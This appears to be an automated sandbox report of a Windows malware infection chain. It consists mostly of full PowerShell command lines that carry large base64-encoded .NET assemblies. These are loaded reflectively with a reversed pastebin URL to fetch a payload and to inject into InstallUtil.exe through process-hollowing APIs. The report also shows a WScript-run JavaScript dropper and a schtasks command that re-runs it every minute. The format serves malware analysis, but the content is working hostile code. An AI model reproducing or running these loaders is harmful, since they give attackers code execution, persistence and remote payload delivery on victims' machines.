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RpdGxlQXR0cmlidXRlAFN0YW5kYXJkTW9kdWxlQXR0cmlidXRlAEhpZGVNb2R1bGVOYW1lQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAT2JmdXNjYXRpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBZYW5vQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTdXBwcmVzc1VubWFuYWdlZENvZGVTZWN1cml0eUF0dHJpYnV0ZQBCeXRlAGdldF9WYWx1ZQBzZXRfVmFsdWUAR2V0T2JqZWN0VmFsdWUAZ2V0X1NpemUAU2l6ZU9mAFRvU3RyaW5nAHBhdGgATWFyc2hhbABNaWNyb3NvZnQuVmlzdWFsQmFzaWMuTXlTZXJ2aWNlcy5JbnRlcm5hbABTeXN0ZW0uQ29tcG9uZW50TW9kZWwAQ2xhc3NMaWJyYXJ5MS5kbGwAa2VybmVsMzIuZGxsAG50ZGxsLmRsbABLaWxsAFN5c3RlbQBCb29sZWFuAFZlcnNpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24ATnRVbm1hcFZpZXdPZlNlY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24ARXhjZXB0aW9uAFJ1bgBDdWx0dXJlSW5mbwBaZXJvAEJ1ZmZlcgBSZXNvdXJjZU1hbmFnZXIAVXNlcgBCaXRDb252ZXJ0ZXIAQ29tcHV0ZXIAQ2xlYXJQcm9qZWN0RXJyb3IAU2V0UHJvamVjdEVycm9yAEFjdGl2YXRvcgAuY3RvcgAuY2N0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAENsYXNzTGlicmFyeTEuUmVzb3VyY2VzLnJlc291cmNlcwBHZXRCeXRlcwBSZWZlcmVuY2VFcXVhbHMAUnVudGltZUhlbHBlcnMAQ3JlYXRlUHJvY2VzcwBDb25jYXQARm9ybWF0AE9iamVjdABXb3c2NEdldFRocmVhZENvbnRleHQAV293NjRTZXRUaHJlYWRDb250ZXh0AFZpcnR1YWxBbGxvY0V4AEFycmF5AGdldF9Bc3NlbWJseQBCbG9ja0NvcHkAUmVhZFByb2Nlc3NNZW1vcnkAV3JpdGVQcm9jZXNzTWVtb3J5AFN5c3RlbS5TZWN1cml0eQBJc051bGxPckVtcHR5AAAvQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAuAFIAZQBzAG8AdQByAGMAZQBzAAALIgB7ADAAfQAiAAADIAAAAAAA/CfjrbM7ckihJ/4I2ykiTQADIAABBSABARERBhUSKAESDAYVEigBEggGFRIoARIZBhUSKAESJAQgABMABAABHBwEIAECHAMgAAgGAAESKREtAyAADgIeAAUQAQAeAAYVEjUBEwAGFRIoARMABwYVEjUBEwACEwAFIAEBEwAFAAICHBwEIAASQQYgAgEOEkEGAAESSRJJAgYOBQACDg4cBQABCBIpBAABAg4GAAMODg4OAgYYBgACCB0FCAMAAAgGAAIGHQUIAh0FCgAFARJxCBJxCAgFAAEdBQgFAAEBEmEFAAESVQgDAAABBCABAQgEIAEBDgQgAQECByAEAQ4ODg4EBwESDAQHARIIBAcBEhkEBwESJAcHAxI5AhI5BAcBEj0EBwESGAUHAwIIAjUHLQIIDhEwESwICB0ICAgICAIICAYdBQgCAgICAgICAgICAggICAgIAh0FAgICAgICAhJVAgMHAQIDBwEIBAcBEikDBwEOBQcCHgACBAoBHgAHBwMTABMAAgQKARMACLA/X38R1Qo6CLd6XFYZNOCJEDEALgAwAC4AMQA1AC4AMAAHBhUSKAESDAcGFRIoARIIBwYVEigBEhkHBhUSKAESJAMGEjkDBhI9AwYSGAIGCQIGCAIGBgQAABIMBAAAEggEAAASGQQAABIkBAAAEjkEAAASPQUAAQESPQQAABIYEQAKAg4OGBgCCRgOEBEwEBEsBgACAhgdCAoABQIYCBAICBAICgAFAhgIHQUIEAgFAAIIGAgIAAUIGAgICAgEAAEIGAYAAgIOHQUIAAQCDg4dBQIEIAASKQcQAQEeAB4ABzABAQEQHgAIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBEgEADUNsYXNzTGlicmFyeTEAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMjEAACkBACQ0NTE2RTBFMS01QzBFLTRCNEUtOUEzMi05RTM3RTIzRTc0MjYAAAwBAAcxLjAuMC4wAAAEAQAAAAgBAAEAAAAAAAgBAAIAAAAAAGEBADRTeXN0ZW0uV2ViLlNlcnZpY2VzLlByb3RvY29scy5Tb2FwSHR0cENsaWVudFByb3RvY29sEkNyZWF0ZV9fSW5zdGFuY2VfXxNEaXNwb3NlX19JbnN0YW5jZV9fAAAAHQEAAQBUAhVTdHJpcEFmdGVyT2JmdXNjYXRpb24AtAAAAM7K774BAAAAkQAAAGxTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlUmVhZGVyLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkjU3lzdGVtLlJlc291cmNlcy5SdW50aW1lUmVzb3VyY2VTZXQCAAAAAAAAAAAAAABQQURQQURQtAAAAOg+AAAAAAAAAAAAAAI/AAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD0PgAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAADwDAAAAAAAAAAAAADwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsAScAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAAB4AgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAARAAOAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAABEABIAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBkAGwAbAAAAEgAEgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgACAAMgAwADIAMQAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAATAASAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBkAGwAbAAAADwADgABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAMAAAAFD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPhjAAAAAAAAAAAAABJkAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEZAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWIAAADwDAAAAAAAAAAAAADwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsAScAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAAB4AgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAARAAOAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAABEABIAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBkAGwAbAAAAEgAEgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgACAAMgAwADIANAAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAATAASAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBkAGwAbAAAADwADgABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMwAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAJDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';[Byte[]] $EuKVK = [System.Convert]::FromBase64String( $bFjDJ );[System.AppDomain]::CurrentDomain.Load($EuKVK).GetType('ClassLibrary3.reed').GetMethod('testd').Invoke($null, [object[]] ('xvdvZ3wN/war/moc.nibetsap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\Chromeglogge.js' , 'Chromeudata', '3', '1', 'Regedit Name' ) );
  2⤵
  - Blocklisted process makes network request
  - Drops startup file
  - Suspicious use of SetThreadContext
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1068
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:2116

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Chromeglogge.js"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3660
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /delete /tn Chromeupd /f
  2⤵
  PID:2484
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /tn Chromeupd /tr "C:\Users\Admin\AppData\Local\Temp\Chromeglogge.js" /sc minute /mo 1
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:2312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $bFjDJ = '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